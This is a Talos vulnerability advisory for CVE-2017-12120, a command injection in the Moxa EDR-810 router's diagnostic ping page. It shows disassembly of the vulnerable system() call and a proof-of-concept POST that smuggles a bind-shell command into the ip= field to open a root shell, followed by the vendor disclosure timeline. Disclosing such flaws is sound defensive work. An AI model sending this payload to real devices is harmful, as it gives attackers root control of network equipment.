Talos Vulnerability Report

TALOS-2017-0472

Moxa EDR-810 Web Server ping Command Injection Vulnerability

April 13, 2018
CVE Number

CVE-2017-12120

Summary

An exploitable command injection vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP POST can cause a privilege escalation, resulting in a root shell. An attacker can inject OS commands into the ip= parm in the "/goform/net_WebPingGetValue" URI to trigger this vulnerability.

Tested Versions

Moxa EDR-810 V4.1 build 17030317

Product URLs

https://www.moxa.com/product/EDR-810.htm

CVSSv3 Score

8.8 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Details

Once logged in to the device's web interface, a diagnostic ping page can be found. This page asks the user for an IP address to ping. There is input validation client-side, but it can be easily bypassed by using tools, such as cURL or Wget. There is no server-side validation of input. The page will call the system to run the Linux ping command. The system will run the following command with '%s' as user-controlled input.

echo "$(ping -c 4 %s -q -W 3| grep 'received' | cut -d ' ' -f4)" > /mnt/ramdisk/MagicPingResult

The code below shows user input being passed to system.

R0, =aRmFMntRamdiskM ; "rm -f /mnt/ramdisk/MagicPingResult"
.text:0003C7D8                 BL              system
.text:0003C7DC                 LDR             R2, =aEchoPingC4SQW3 ; "echo "$(ping -c 4 %s -q -W 3| grep 'received' | cut -d ' ' -f4)" > /mnt/ramdisk/MagicPingResult"
.text:0003C7E0                 SUB             R1, R11, #-command
.text:0003C7E4                 SUB             R3, R11, #-dest
.text:0003C7E8                 MOV             R0, R1  ; s
.text:0003C7EC                 MOV             R1, R2  ; format
.text:0003C7F0                 MOV             R2, R3
.text:0003C7F4                 BL              sprintf
.text:0003C7F8                 SUB             R3, R11, #-command
.text:0003C7FC                 MOV             R0, R3  ; command
.text:0003C800                 BL              system # call to system

Vulnerable URI: /goform/net_WebPingGetValue Vulnerable Parameter: ip=

Exploit Proof-of-Concept

The following POST will start a root shell on port 5000.

POST: /goform/net_WebPingGetValue HTTP/1.1
Host: DeviceIP
Cooke: Valid-Cookie
Content-Type: japplication/x-www-form-urlencoded

pingTemp=127.0.0.1&ifs=1&ip=`tcpsvd 0 5000 /bin/bash`#

Timeline

2017-11-15 - Vendor Disclosure
2017-11-19 - Vendor Acknowledged
2017-12-25 - Vendor provided timeline for fix (Feb 2018)
2018-01-04 - Timeline pushed to mid-March per vendor
2018-03-24 - Talos follow up with vendor for release timeline
2018-03-26 - Timeline pushed to 4/13/18 per vendor
2018-04-12 - Vendor patched & published new firmware on website
2018-04-13 - Public Release

Credit

Discovered by Carlos Pacho of Cisco Talos.